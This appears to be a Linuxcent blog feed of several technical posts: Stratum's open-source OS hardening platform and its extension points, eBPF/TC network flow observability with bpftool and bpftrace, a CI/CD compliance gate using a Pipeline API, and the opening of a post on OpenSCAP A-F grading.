  ┌─────────────────┐   ┌─────────────────┐
  │ Ansible-Lockdown │   │  OpenSCAP       │
  │  Runner          │   │  Scanner        │
  │                  │   │                 │
  │  UBUNTU22-CIS    │   │  A-F grade      │
  │  RHEL8-STIG      │   │  SARIF export   │
  │  Custom roles    │   │  Drift detect   │
  └────────┬─────────┘   └────────┬────────┘
           │                      │
           └──────────┬───────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Golden Image          │
         │   (AMI / GCP / Azure)   │
         │   + compliance metadata │
         └────────────┬────────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Pipeline API          │
         │   (Apache 2.0, OSS)     │
         │                         │
         │  POST /api/pipeline/scan │
         │  ← CI/CD gate           │
         └─────────────────────────┘

Every component is open-source under Apache 2.0. The engine, provider layer, Ansible runner, OpenSCAP scanner, and Pipeline API are all in the repository. Nothing is locked to a hosted service.

Installation

Stratum runs as a set of containers. Kubernetes or Docker Compose both work.

Kubernetes (Helm):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Install Stratum in your cluster using the bundled Helm chart
helm install stratum ./deploy/helm/stratum \
  --namespace stratum-system \
  --create-namespace \
  --set config.providers.aws.enabled=true \
  --set config.providers.gcp.enabled=true \
  --set config.storageClass=standard

# Verify
kubectl get pods -n stratum-system
# NAME                          READY   STATUS    RESTARTS   AGE
# stratum-engine-0              1/1     Running   0          2m
# stratum-scanner-7d9b4-abc12   1/1     Running   0          2m
# stratum-api-6c8f5-def34       1/1     Running   0          2m

Docker Compose (single-node):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Configure providers
cp config/providers.example.yaml config/providers.yaml
vim config/providers.yaml  # add AWS/GCP/Azure credentials

# Start
docker compose up -d

# Stratum is available at http://localhost:8080

The Three Extension Points

1. Custom Compliance Controls

Add controls that aren’t in the CIS benchmark — internal policies, org-specific security requirements, or controls from other frameworks:

# controls/custom-audit-policy.yaml
id: CUSTOM-001
title: Audit logging retention must be 90 days
description: All instances must retain audit logs for 90 days minimum
severity: high
benchmark: custom
check:
  type: command
  command: "grep -E '^max_log_file_action' /etc/audit/auditd.conf"
  expected: "max_log_file_action = keep_logs"
remediation:
  type: ansible
  task: |
    - name: Configure audit log retention
      lineinfile:
        path: /etc/audit/auditd.conf
        regexp: '^max_log_file_action'
        line: 'max_log_file_action = keep_logs'

Deploy the custom control:

stratum controls deploy --file controls/custom-audit-policy.yaml

Reference it in any blueprint:

compliance:
  benchmark: cis-l1
  controls: all
  additional_controls:
    - CUSTOM-001

Custom controls appear in the grade calculation and SARIF output alongside CIS controls.

2. Provider Plugins

Add support for a new cloud provider by implementing the provider interface:

# providers/custom_provider.py
from stratum.providers import BaseProvider

class CustomProvider(BaseProvider):
    name = "my-cloud"

    def provision_build_instance(self, blueprint, config):
        # Launch a build instance on your cloud
        # Return: instance_id, connection_details
        ...

    def create_image(self, instance_id, blueprint, grade):
        # Snapshot the instance into an image
        # Tag with compliance metadata
        # Return: image_id
        ...

    def terminate_instance(self, instance_id):
        # Clean up the build instance
        ...

stratum providers register --file providers/custom_provider.py --name my-cloud

The provider is now available as --provider my-cloud in all stratum build commands.

3. Pipeline Integrations

Beyond the curl-based API, Stratum provides a webhook system that fires on build completion, scan results, and gate failures:

# Webhook configuration
notifications:
  - event: pipeline_gate_failure
    webhook: https://hooks.slack.com/...
    template: |
      Image {{ image_id }} failed compliance gate.
      Grade: {{ grade }} (required: {{ min_grade }})
      Top failing controls:
      {% for control in failing_controls[:3] %}
      - {{ control.id }}: {{ control.title }}
      {% endfor %}

  - event: build_complete
    webhook: https://jira.yourdomain.com/api/...
    template: |
      New image built: {{ image_id }}
      Blueprint: {{ blueprint_name }}@{{ blueprint_version }}
      Grade: {{ grade }}

The Open-Core Model

Stratum follows the same model as the tools that have become infrastructure standards:

Tool	Open-core model
Terraform / OpenTofu	Core OSS, enterprise features in paid tier
Cilium / Isovalent	Core OSS, enterprise support/features in paid tier
Vault / HCP Vault	Core OSS, hosted/enterprise in paid tier
Stratum	Engine + blueprint + scanner + Pipeline API: Apache 2.0

Everything taught in this series — the blueprint format, the build pipeline, the compliance grading, the CI/CD gate — is in the OSS core. You can self-host it, extend it, contribute to it, and run it in your own infrastructure without any dependency on a hosted service.

The repository is at: github.com/rrskris/Stratum

What This Series Taught

EP01 — EP06 in one view:

Episode	What you learned	What Stratum does
EP01	Default AMIs are insecure by design	Replaces default AMI with a hardened golden image
EP02	Blueprint as code — the 2am skip disappears	HardeningBlueprint YAML — 5-step wizard or direct YAML
EP03	One blueprint, six providers, no drift	6 providers: AWS, GCP, Azure, DigitalOcean, Linode, Proxmox
EP04	Automated OpenSCAP — grade at build time	Compliance Scanner: A-F, SARIF, drift detection
EP05	CI/CD gate — the unhardened image never deploys	Pipeline API: `POST /api/pipeline/scan`
EP06	The platform — OSS, self-hostable, extendable	Apache 2.0, Helm install, three extension points

What’s Next

This series closes the OS hardening gap. The same principle — declare desired state, build reproducibly, verify automatically — applies to every layer of your infrastructure.

If you’ve been following the eBPF: From Kernel to Cloud series, EP10 covers what happens when you combine kernel-level observability with the hardened base that Stratum provides: every connection, every process spawn, every file access — visible from the host kernel, on an OS baseline you can verify.

The next series: Purple Team Playbook — real attack paths against cloud and Kubernetes infrastructure, how they’re detected, and how they’re closed. Starting May 8.

GitHub: github.com/rrskris/Stratum

Get the Purple Team series in your inbox → linuxcent.com/subscribe

The post Stratum — OS Hardening as a Platform appeared first on Linuxcent.

Network Flow Observability — What Every Connection Reveals

Vamshi Krishna Santhapuri — Fri, 29 May 2026 02:00:00 +0000

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 10
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability

TL;DR

Network flow observability with eBPF attaches persistent programs to TC hooks and records every connection attempt, retransmit, reset, and drop — continuously, with no sampling
(TC hook = Traffic Control hook: the point in the Linux network stack where eBPF programs intercept packets after ingress or before egress, tied to a specific network interface)
APM tools and service mesh telemetry are interpretations of what happened; kernel-level flow data from TC hooks is the raw event stream they all derive from
Retransmit counters at the kernel level reveal congestion, half-open connections, and remote endpoint failures that application logs never surface
Cilium’s Hubble and similar tools (Pixie, Retina) are eBPF flow exporters — they run TC programs, collect perf_event or ringbuf events, and expose them over an API
You can verify what flow data a tool is actually collecting with four bpftool commands — without reading documentation
Production caution: flow maps grow with the number of active connections; pin and bound your maps, and account for the per-packet overhead on high-throughput interfaces

EP09 showed bpftrace as an on-demand kernel query tool — compile a question, get an answer, clean up. Network flow observability with eBPF is the persistent version: programs that stay attached to TC hooks across your entire fleet, recording every connection without waiting for you to ask. When a client reports intermittent failures that appear nowhere in application logs, that persistent record is what you query. This episode covers how that layer works and how to read it.

Quick Check: What Flow Data Is Your Cluster Already Collecting?

Before building anything new, check what’s already running. If you have Cilium, Pixie, or Retina on your cluster, eBPF flow programs are already attached:

# SSH into a worker node, then:

# What TC programs are attached to cluster interfaces?
bpftool net list

# Expected output on a Cilium node:
# xdp:
#
# tc:
# eth0(2) clsact/ingress prog_id 38 prio 1 handle 0x1 direct-action
# eth0(2) clsact/egress  prog_id 39 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/ingress prog_id 41 prio 1 handle 0x1 direct-action
# lxc12a3(15) clsact/egress  prog_id 42 prio 1 handle 0x1 direct-action

# What maps are those programs holding state in?
bpftool map list | grep -E "flow|conn|sock|nat"

# Sample output:
# 24: hash  name cilium_ct4_global  flags 0x0
#     key 24B  value 56B  max_entries 65536  memlock 4718592B
# 25: hash  name cilium_ct4_local   flags 0x0
#     key 24B  value 56B  max_entries 8192   memlock 589824B

Each lxcXXXX interface is a pod’s veth pair. The TC programs on those interfaces are what Cilium uses to enforce NetworkPolicy and collect flow telemetry. If you see prog_id values on pod interfaces, your cluster is already doing kernel-level flow collection.

Not running Cilium? On a plain kubeadm or EKS node without a CNI that uses eBPF, bpftool net list will show no TC programs on pod interfaces — just whatever kube-proxy or the CNI plugin installed. You can still attach your own flow programs with tc qdisc add dev eth0 clsact — that’s the starting point this episode covers.

The client opened a ticket on a Tuesday afternoon. “Intermittent connection failures to the payment gateway. Started around 11 AM. Application logs say timeout. Retry logic is masking it for most users but the error rate is up 0.3%.”

I looked at the APM dashboard. The service showed elevated latency — p99 at 850ms versus a normal 120ms — but no hard errors at the application layer. The service mesh metrics showed the downstream call succeeding from the mesh’s perspective. The payment gateway team said their side looked clean.

Three tools. Three different answers. All of them interpreting the network. None of them were the network.

I ran:

bpftool map dump id 24 | grep -A5 "payment-gateway-ip"

The connection tracking map showed retransmit count 14 for a specific (src_ip, dst_ip, src_port, dst_port) tuple — the same 5-tuple, every 30 seconds, for 2 hours. The kernel was retransmitting. The TCP stack was compensating. The application was seeing sporadic success because retransmits eventually got through. The APM dashboard averaged that latency into a p99 and called it “elevated.”

The kernel had the truth. Everything above it was rounding.

Why Application-Level Metrics Miss What the Kernel Sees

Application metrics — APM spans, service mesh telemetry, load balancer health checks — operate at Layer 7. They measure round-trip time for complete requests, error codes returned, bytes transferred. They answer “did this request succeed?” not “what did the network do to make it succeed?”

The TCP stack underneath those requests handles retransmits, congestion window adjustments, RST packets, and half-open connections silently. From an application’s perspective, a request that required 3 retransmits before the ACK arrived looks identical to one that succeeded on the first attempt — slightly slower, but successful.

This is structural, not a tooling gap. Application-layer observability tools cannot see below their own protocol boundary. The kernel’s TCP implementation does not report upward when it retransmits. It just retransmits.

eBPF flow observability closes this gap by attaching programs directly to the network path — at the TC hook, which fires on every packet crossing a network interface — and recording what the kernel actually does.

How TC Hook Flow Programs Work

EP08 covered TC eBPF programs for pod network policy. Flow observability uses the same attachment point with a different purpose: instead of allowing or dropping packets, the program reads packet metadata and writes it to a map or ring buffer.

Pod sends packet
      ↓
veth interface (lxcXXXX)
      ↓
TC clsact/egress hook fires
      ↓
eBPF program reads:
  - src IP, dst IP
  - src port, dst port
  - protocol
  - packet size
  - TCP flags (SYN, ACK, FIN, RST, retransmit bit)
      ↓
Writes event to ringbuf (or perf_event_array)
      ↓
Userspace consumer reads ringbuf
      ↓
Aggregates to flow record
      ↓
Exports to Hubble/Prometheus/flow store

ringbuf — a BPF ring buffer: a lock-free, memory-efficient queue shared between a kernel eBPF program and a userspace consumer. The kernel program writes events; the userspace reader drains them. Used instead of perf_event_array in kernel 5.8+ because it avoids per-CPU memory waste and supports variable-length records. When you see Hubble exporting flows, it’s reading from a ringbuf that the TC program writes to.

The key structural property: the TC hook fires on every packet. Not sampled. Not throttled by default. Every SYN, every ACK, every RST, every retransmit. For flow observability, you typically aggregate at the program level — count packets and bytes per 5-tuple per second, rather than emitting an event per packet — but the raw visibility is there if you need it.

What Retransmit Telemetry Actually Reveals

Most flow observability implementations track TCP retransmits specifically because they are the clearest signal of network-layer trouble invisible to applications.

A TCP retransmit happens when a sender doesn’t receive an ACK within the retransmission timeout (RTO). The kernel resends the segment and doubles the timeout (exponential backoff). From the application’s perspective, the call takes longer. If retransmits keep clearing, the application sees success — just slow success.

perf_event — a kernel mechanism for collecting performance data. In eBPF, BPF_MAP_TYPE_PERF_EVENT_ARRAY lets kernel programs push variable-length records to userspace readers via a ring buffer per CPU. Older tools use perf_event_array; newer ones use BPF_MAP_TYPE_RINGBUF (single shared ring, more efficient). If you inspect an older version of Cilium’s flow exporter, you’ll see perf_event writes; newer versions use ringbuf.

To observe retransmits directly with bpftrace:

# Count retransmit events per destination IP — run for 60 seconds
bpftrace -e '
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    @retransmits[$daddr] = count();
}
interval:s:60 { print(@retransmits); clear(@retransmits); exit(); }
'

Sample output:

Attaching 2 probes...
@retransmits[10.96.0.10]:   2       # DNS service — normal
@retransmits[172.16.4.23]:  847     # payment gateway endpoint ← problem here
@retransmits[10.244.1.5]:   1       # normal pod-to-pod traffic

847 retransmits to a single endpoint in 60 seconds. That’s not noise. That’s a congested or half-open connection being retried 14 times per second by the TCP stack while the application layer averages it into “elevated latency.”

How Cilium Hubble Collects Flow Data

Hubble is the flow observability layer built into Cilium. Understanding how it works makes you able to reason about what it can and cannot see — and how to verify what it’s actually collecting.

Hubble’s architecture:

Kernel (per node)
├── TC eBPF programs on all pod veth interfaces
│     write flow events → BPF ringbuf
│
└── Hubble node agent (userspace)
      reads ringbuf
      enriches with pod metadata (Kubernetes API)
      exposes gRPC API

Cluster level
└── Hubble Relay
      aggregates per-node gRPC streams
      exposes single cluster-wide API

User tooling
└── hubble observe  /  Hubble UI  /  Prometheus exporter

The TC programs are writing raw packet events. The Hubble agent is the consumer that translates those events into Kubernetes-aware flow records — adding pod name, namespace, label, and policy verdict on top of the 5-tuple and TCP metadata the kernel provides.

To see what Hubble’s TC programs have attached:

# On any Cilium node
bpftool net list | grep lxc

# lxce4a1(23) clsact/ingress prog_id 61  ← Hubble flow program on pod interface ingress
# lxce4a1(23) clsact/egress  prog_id 62  ← Hubble flow program on pod interface egress
# lxcf7b2(31) clsact/ingress prog_id 63
# lxcf7b2(31) clsact/egress  prog_id 64

# Inspect one of those programs to confirm it's reading flow metadata
bpftool prog show id 61

# Output:
# 61: sched_cls  name tail_handle_nat  tag 3a8e2f1b4c7d9e0a  gpl
#     loaded_at 2026-04-22T09:13:45+0530  uid 0
#     xlated 2144B  jited 1382B  memlock 4096B  map_ids 24,31,38
#     btf_id 142

sched_cls is the BPF program type for TC — confirming these are TC-attached flow programs. map_ids 24,31,38 — those are the maps this program reads from and writes to. You can dump any of them:

bpftool map dump id 24 | head -40

# Output (connection tracking entry):
# [{
#     "key": {
#         "saddr": "10.244.1.5",        # ← source pod IP
#         "daddr": "172.16.4.23",        # ← destination IP
#         "sport": 48291,                # ← source port
#         "dport": 443,                  # ← destination port
#         "nexthdr": 6,                  # ← protocol: TCP
#         "flags": 3                     # ← CT_EGRESS | CT_ESTABLISHED
#     },
#     "value": {
#         "rx_packets": 14832,           # ← packets received
#         "tx_packets": 14831,           # ← packets sent
#         "rx_bytes": 3841024,           # ← bytes received
#         "tx_bytes": 3756288,           # ← bytes sent
#         "lifetime": 21600,             # ← seconds until entry expires
#         "rx_closing": 0,
#         "tx_closing": 0
#     }
# }]

That’s the ground truth. Not an APM span. Not a service mesh metric. The actual per-connection counters the kernel is maintaining for that 5-tuple.

Writing a Minimal Flow Observer with bpftrace

You don’t need Cilium or Hubble to get flow telemetry. bpftrace can produce it directly on any node with BTF:

# Persistent flow table: connections + packet counts for 2 minutes
bpftrace -e '
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    $dport = $sk->__sk_common.skc_dport >> 8;
    @flows[comm, $daddr, $dport] = count();
}
interval:s:30 { print(@flows); clear(@flows); }
' --timeout 120

Sample output (every 30 seconds):

@flows[curl, 93.184.216.34, 443]:         12    # curl → example.com:443
@flows[coredns, 10.96.0.10, 53]:          341   # CoreDNS upstream queries
@flows[payment-svc, 172.16.4.23, 443]:   1204   # payment service → gateway
@flows[nginx, 10.244.2.3, 8080]:          89    # nginx → upstream pod

For retransmit tracking specifically:

# Combined flow + retransmit watcher — runs until Ctrl-C
bpftrace -e '
kprobe:tcp_retransmit_skb {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    @retx[comm, $daddr] = count();
}
kprobe:tcp_sendmsg {
    $sk = (struct sock *)arg0;
    $daddr = ntop(AF_INET, $sk->__sk_common.skc_daddr);
    @sends[comm, $daddr] = count();
}
interval:s:10 {
    printf("=== Retransmit ratio (last 10s) ===\n");
    print(@retx);
    print(@sends);
    clear(@retx);
    clear(@sends);
}
'

This gives you both the volume of sends and the retransmit count side by side — the ratio tells you whether retransmits are a rounding error (0.01%) or a signal (5%+).

Production Gotchas

Map size bounds matter. Connection tracking maps default to tens of thousands of entries. On nodes with high connection churn (serverless, short-lived batch jobs), maps can fill and start dropping new entries silently. Check bpftool map show id N for max_entries and monitor map utilization. Cilium exposes this as cilium_bpf_map_pressure in Prometheus.

Per-packet overhead on high-throughput interfaces. A TC program that fires on every packet on a 10Gbps interface processes millions of packets per second. Aggregating at the program level (count per 5-tuple rather than emit per packet) keeps overhead manageable — Cilium does this. A naive bpftrace one-liner that emits a perf event per packet will saturate the perf ring buffer under real load. Use ringbuf write paths or aggregate before emitting.

TC hook placement and direction confusion. Ingress TC on a pod’s veth (lxcXXXX) sees egress traffic from the pod’s perspective — because the host sees the packet arriving on the veth after the pod sent it. This reversal is consistent but confusing when you’re reading direction labels in flow records. EP08 covered this in detail for policy enforcement; the same asymmetry applies to flow data.

Retransmit counters reset on connection close. If you’re tracking retransmit totals for a long-lived connection, the count is stored in the kernel’s socket state and is cleared when the socket closes. For persistent tracking across reconnects, aggregate at the flow level in userspace before the connection closes.

Hubble flow visibility requires pod interfaces. Hubble only sees traffic that crosses a pod’s veth interface. Node-to-node traffic that doesn’t involve a pod (e.g., node SSH, kubelet-to-API-server on the node IP) is not captured by default. For host-level network observability, you need a TC program on the physical interface (eth0, ens3), not just on pod veth pairs.

Quick Reference

What you want to see	Command
What TC programs are attached	`bpftool net list`
Which maps a program uses	`bpftool prog show id N` (check `map_ids`)
Connection tracking entries	`bpftool map dump id N`
Retransmits per destination	`bpftrace -e 'kprobe:tcp_retransmit_skb { ... }'`
Flow counts per process	`bpftrace -e 'kprobe:tcp_sendmsg { @[comm, daddr] = count(); }'`
Hubble flow stream (Cilium)	`hubble observe --follow`
Hubble flows for one pod	`hubble observe --pod mynamespace/mypod --follow`
Verify map pressure	`bpftool map show id N` (check `max_entries` vs entries)

Kernel function	What it marks
`tcp_sendmsg`	Data being sent on a TCP socket
`tcp_recvmsg`	Data being received on a TCP socket
`tcp_retransmit_skb`	A segment being retransmitted
`tcp_send_reset`	RST being sent
`tcp_fin`	Connection teardown initiated
`tcp_connect`	New outbound TCP connection attempt

Key Takeaways

Network flow observability with eBPF attaches TC programs that record every connection event continuously — not sampled, not throttled, not filtered by what the application reports
Retransmit telemetry from tcp_retransmit_skb reveals congestion and endpoint failures that are structurally invisible to application-layer monitoring tools
Cilium Hubble, Pixie, and Retina are all eBPF flow exporters — they run TC programs, drain a ringbuf, enrich with Kubernetes metadata, and expose the result over an API
You can verify what any flow tool is actually collecting with bpftool net list, bpftool prog show, and bpftool map dump — four commands, no documentation needed
Map sizing and per-packet overhead are the two production concerns; aggregate at the kernel level, bound your maps, and monitor map pressure
The kernel’s connection tracking map is the ground truth. APM dashboards, service mesh metrics, and load balancer health checks are all interpretations of what that map contains

What’s Next

Flow observability tells you what connections exist. EP11 goes one level deeper: what names your pods are resolving those connections to. DNS is where a compromised workload first reveals itself — it queries a domain that has no business being queried from a production pod, and if you’re not watching the kernel-level DNS path, you won’t see it until after the damage.

DNS observability at the kernel level uses tracepoint hooks on the DNS syscall path — the same ground-truth approach as flow telemetry, but for name resolution: every query, every response, tied to the pod that made it, without deploying a sidecar.

Next: DNS observability at the kernel level — what your pods are actually resolving

Get EP11 in your inbox when it publishes → linuxcent.com/subscribe

The post Network Flow Observability — What Every Connection Reveals appeared first on Linuxcent.

The Pipeline Gate — Hardened Images as a CI/CD Build Constraint

Vamshi Krishna Santhapuri — Sat, 23 May 2026 02:00:00 +0000

Reading Time: 6 minutes

OS Hardening as Code, Episode 5
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate**

TL;DR

A CI/CD compliance gate turns an OS hardening grade from a report into a build constraint — unhardened images fail the pipeline before they can be deployed
POST /api/pipeline/scan returns pass/fail against a minimum grade threshold — integrates into any CI/CD system that can make an HTTP request
Failed gate output tells engineers exactly which controls failed and what to fix — not just “blocked”
The gate works on both build-time grades (new images) and runtime grades (existing instances)
GitHub Actions, GitLab CI, Jenkins, and Tekton integrations are one curl command
The structural guarantee: an image that doesn’t pass the gate doesn’t exist in the deployment pipeline

The Problem: A Grade No One Checks Is Decoration

Pipeline without compliance gate:
  Build → Test → Security scan (results to dashboard) → Deploy

What actually happens:
  Build → Test → Security scan → "C grade, but we need to ship" → Deploy anyway
                                           │
                                           └─ Dashboard shows C grade
                                              Nobody is paged
                                              Deployment succeeds

A CI/CD compliance gate means the pipeline can’t continue if the grade is below threshold.

EP04 showed that automated OpenSCAP compliance gives every image a verified, reproducible grade before deployment. What it assumed is that someone checks the grade before deploying. They don’t — not under deadline pressure, not when the image has been “working fine for months,” not at 2am.

The same problem that made hardening runbooks skippable applies to compliance grades: if checking the grade is a discretionary step, it will be skipped.

A new microservice was deployed from an unhardened base image. The team had built it quickly during a sprint, used a community AMI as the base, and planned to harden it “in the next sprint.”

Three weeks later, a penetration test found it. SSH password authentication enabled. Three unnecessary services running — one of them with a known CVE. The finding: the instance had full inbound access from the VPC and was reachable from a compromised adjacent instance.

The deployment had gone through the normal CI/CD pipeline. Unit tests passed. Integration tests passed. A vulnerability scan ran. The scan produced a report that went to a dashboard. Nobody had a gate set up to fail the build if the image was unhardened.

The hardening work from the “next sprint” plan would have taken four hours. The pentest remediation took a week, plus the time to investigate what had been exposed during the three weeks the instance was running.

The CI/CD pipeline had every check except the one that would have caught the base image problem before the first deployment.

The Pipeline API

The Pipeline API is a single HTTP endpoint that takes an image or instance ID, checks it against a minimum grade, and returns pass or fail:

# Fail the pipeline if the image grade is below B
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H "Authorization: Bearer ${STRATUM_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "image_id": "ami-0a7f3c9e82d1b4c05",
    "min_grade": "B"
  }'

# Pass response (grade A):
# HTTP 200
# {
#   "result": "pass",
#   "image_id": "ami-0a7f3c9e82d1b4c05",
#   "grade": "A",
#   "score": 94,
#   "controls_passing": 94,
#   "controls_total": 100,
#   "scanned_at": "2026-04-19T15:54:10Z"
# }

# Fail response (grade C):
# HTTP 422
# {
#   "result": "fail",
#   "image_id": "ami-0c9d5e3f81a2b6e07",
#   "grade": "C",
#   "score": 72,
#   "min_grade_required": "B",
#   "failing_controls": [
#     { "id": "1.1.7", "title": "Separate partition for /var/log/audit", "severity": "medium" },
#     { "id": "3.3.2", "title": "TCP SYN cookies enabled", "severity": "low" },
#     ...
#   ]
# }

A non-200 response fails the pipeline. The || exit 1 in the shell integration handles this — if the API returns 422, the pipeline step exits non-zero and the job fails.

GitHub Actions Integration

# .github/workflows/deploy.yml

jobs:
  build-image:
    runs-on: ubuntu-latest
    outputs:
      ami_id: ${{ steps.build.outputs.ami_id }}
    steps:
      - name: Build hardened AMI
        id: build
        run: |
          AMI_ID=$(stratum build \
            --blueprint ubuntu22-cis-l1.yaml \
            --provider aws \
            --output json | jq -r '.image_id')
          echo "ami_id=${AMI_ID}" >> $GITHUB_OUTPUT

  compliance-gate:
    runs-on: ubuntu-latest
    needs: build-image
    steps:
      - name: Stratum compliance gate
        run: |
          curl -sf -X POST ${{ vars.STRATUM_URL }}/api/pipeline/scan \
            -H "Authorization: Bearer ${{ secrets.STRATUM_TOKEN }}" \
            -H "Content-Type: application/json" \
            -d "{\"image_id\": \"${{ needs.build-image.outputs.ami_id }}\", \"min_grade\": \"B\"}" \
            || { echo "Compliance gate failed — image does not meet minimum grade B"; exit 1; }

  deploy:
    runs-on: ubuntu-latest
    needs: [build-image, compliance-gate]
    steps:
      - name: Deploy to staging
        run: |
          aws autoscaling update-auto-scaling-group \
            --auto-scaling-group-name my-asg \
            --launch-template "ImageId=${{ needs.build-image.outputs.ami_id }}"

The deploy job only runs if compliance-gate passes. The AMI doesn’t reach the autoscaling group if it doesn’t meet the grade threshold.

GitLab CI Integration

# .gitlab-ci.yml

stages:
  - build
  - compliance
  - deploy

build-image:
  stage: build
  script:
    - |
      AMI_ID=$(stratum build \
        --blueprint ubuntu22-cis-l1.yaml \
        --provider aws \
        --output json | jq -r '.image_id')
      echo "AMI_ID=${AMI_ID}" >> build.env
  artifacts:
    reports:
      dotenv: build.env

compliance-gate:
  stage: compliance
  needs: [build-image]
  script:
    - |
      curl -sf -X POST ${STRATUM_URL}/api/pipeline/scan \
        -H "Authorization: Bearer ${STRATUM_TOKEN}" \
        -H "Content-Type: application/json" \
        -d "{\"image_id\": \"${AMI_ID}\", \"min_grade\": \"B\"}"

deploy:
  stage: deploy
  needs: [build-image, compliance-gate]
  script:
    - ./deploy.sh ${AMI_ID}

What the Failed Gate Tells You

The value of the CI/CD compliance gate is not just that it blocks bad images — it’s that the failure output tells engineers what to fix.

A gate failure in CI shows:

Compliance gate failed.

Image: ami-0c9d5e3f81a2b6e07
Grade: C (72/100)
Required: B (85/100)
Gap: 13 controls failing

Failing controls:
  HIGH   1.1.7   Separate partition for /var/log/audit
                 Fix: Provision /var/log/audit on a separate EBS volume
  MEDIUM 1.6.1.3 AppArmor enabled in bootloader
                 Fix: Update GRUB_CMDLINE_LINUX, run update-grub, reboot
  MEDIUM 3.3.2   TCP SYN cookies
                 Fix: echo "net.ipv4.tcp_syncookies=1" > /etc/sysctl.d/60-cis.conf
  LOW    5.2.21  SSH MaxStartups
                 Fix: Add "MaxStartups 10:30:60" to /etc/ssh/sshd_config
  ...

View full scan report: https://stratum.yourdomain.com/scans/ami-0c9d5e3f81a2b6e07

This is not a wall — it’s a list of exactly what to fix. The engineer running the pipeline sees the gap, fixes the blueprint or the Ansible role, rebuilds, and the gate passes. The gap is closed before any instance is deployed.

Runtime Gate: Checking Existing Instances

The Pipeline API also works against running instances, not just images:

# Gate on a running instance's current compliance state
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H "Authorization: Bearer ${STRATUM_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "instance_id": "i-0abc123",
    "min_grade": "B",
    "scan_type": "runtime"
  }'

This is useful in deployment pipelines that don’t build custom AMIs — they launch instances and configure them after launch. The runtime gate runs after configuration is complete and before the instance is registered with the load balancer.

It also integrates into scheduled compliance jobs — scan your fleet on a schedule and alert when any instance drifts below grade threshold.

Grade Thresholds by Environment

Not all environments need the same threshold. A common pattern:

# Environment-specific minimum grades
environments:
  production: A      # 95%+ passing — no exceptions
  staging:    B      # 85%+ passing — minor gaps acceptable
  development: C     # 70%+ passing — experimental OK

# Production deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d '{"image_id": "ami-...", "min_grade": "A"}'

# Staging deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d '{"image_id": "ami-...", "min_grade": "B"}'

This lets development move fast with a lower bar while enforcing the highest standard at the production gate.

Production Gotchas

Gate latency on first scan: If the image hasn’t been scanned yet, the Pipeline API triggers a scan on demand. This takes 2–3 minutes. For build pipelines that want instant gate results, use stratum build --blueprint ... --scan-on-build to ensure the scan runs during the build step and the result is cached for the gate call.

Token rotation: The STRATUM_TOKEN used for API authentication should be rotated on the same schedule as other service credentials. Use environment-specific tokens so a compromised staging token doesn’t bypass a production gate.

Webhook notifications on gate failure: The Pipeline API can send a webhook to Slack, PagerDuty, or any endpoint when a gate fails. Configure this for production pipelines so failures are visible beyond the CI log.

# In the Stratum config
notifications:
  pipeline_failures:
    - type: slack
      webhook: ${SLACK_WEBHOOK}
      channel: "#platform-security"
    - type: webhook
      url: ${PAGERDUTY_WEBHOOK}
      min_grade: D     # only page on D/F, not B/C failures

Key Takeaways

A CI/CD compliance gate turns a compliance grade from a dashboard metric into a pipeline constraint — the image doesn’t deploy if it doesn’t pass
POST /api/pipeline/scan is a single HTTP call that any CI/CD system can make — no agent, no plugin, no SDK required
Failed gate output is actionable: every failing control includes the specific fix, not just the control ID
Runtime gates check instances after configuration, not just at image build time
Environment-specific thresholds let development move faster while enforcing the highest standard at production

What’s Next

The CI/CD compliance gate closes the final gap: even if an unhardened image gets built, it can’t deploy. EP05 is the bookmark episode — this is the point where OS hardening becomes structurally enforced rather than procedurally expected.

EP06 is the series closer. For five episodes, you’ve been using Stratum as a user. What does it look like to run it yourself — extend it with a custom control, add a provider, deploy the platform in your own infrastructure?

Stratum is open-core (Apache 2.0). EP06 is the architecture reveal, the GitHub release, and the extension guide for everything the series taught.

Next: Stratum — open-source OS hardening platform for multi-cloud infrastructure

Get EP06 in your inbox when it publishes → linuxcent.com/subscribe

The post The Pipeline Gate — Hardened Images as a CI/CD Build Constraint appeared first on Linuxcent.

Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment

Vamshi Krishna Santhapuri — Fri, 15 May 2026 02:00:00 +0000

Reading Time: 6 minutes

OS Hardening as Code, Episode 4
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance**

TL;DR

“We use CIS L1” means nothing without a verified grade — automated OpenSCAP compliance provides one before any instance is deployed
Stratum runs OpenSCAP after every build and attaches the grade to the image metadata: cis-l1-A-98
Grades are A through F based on percentage of controls passing, with explicit accounting for documented overrides
SARIF output is machine-readable — importable directly into GitHub Advanced Security, Jira, or any SIEM
Drift detection: rescan any running instance against the original blueprint and see exactly which controls changed since the image was built
An image that scores below your minimum grade threshold doesn’t get snapshotted — it doesn’t exist

The Problem: A Grade That’s Never Been Verified Is Not a Grade

Security audit request:
"Provide CIS L1 compliance evidence for all production instances"

Team response:
  Instance A: "CIS L1 hardened" — OpenSCAP last run: 4 months ago
  Instance B: "CIS L1 hardened" — OpenSCAP last run: never
  Instance C: "CIS L1 hardened" — OpenSCAP version: 1.2 (current: 1.3.8)
  Instance D: "CIS L1 hardened" — manual scan output: "87% passing"
  Instance E: "CIS L1 hardened" — manual scan output: "91% passing"

"Which profile was used for D and E? Are they comparable?"
